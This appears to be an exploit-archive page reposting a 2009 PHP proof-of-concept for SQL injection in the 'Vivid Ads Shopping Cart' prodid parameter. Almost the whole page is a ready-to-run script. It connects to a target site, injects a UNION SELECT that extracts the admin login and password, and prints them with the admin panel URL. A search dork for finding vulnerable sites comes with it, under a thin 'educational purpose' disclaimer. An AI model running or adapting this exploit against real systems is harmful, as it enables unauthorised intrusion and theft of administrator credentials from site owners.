Home / os / win10

vividadspid-sql.txt

Posted on 04 December 2009

<pre> <?php # Vivid Ads Shopping Cart (prodid) Remote SQL Injection # Author: Pr0T3cT10n, pr0t3ct10n[at]gmail[dot]com # This code was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # Dork: "Vivid Ads Shopping Cart" # nullbyte.org.il<http://nullbyte.org.il> $site = 'www.example.com<http://www.example.com>'; # Site address $path = '/path'; # Folder path $contents = ''; $sock = fsockopen($site, 80, $errno, $errstr, 30); if(!$sock){ echo('( ' .$errstr.$errno. ' )'." "); } else{ $pack = "GET " .$path. "/detail.php?prodid=-1+union+select+1,2,3,concat(char(60),login,char(59),password,char(62)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+admin HTTP/1.1 "; $pack.= "Host: " .$site. " "; $pack.= "Connection: Close "; if(fwrite($sock, $pack)){ while(!feof($sock)){ $contents.= fgets($sock, 4096); } if(preg_match('/<(.*);(.*)>/', $contents, $matches)){ echo('User: ' .$matches[1]. ';'." ".'Pass: ' .$matches[2]. ';'." ".'Admin login: http://' .$site.$path. '/admin/'." "); } else{ echo('Can't pull out admin details.'." "); } } else{ echo('Can't write socket.'." "); } } ?> </pre>

 

TOP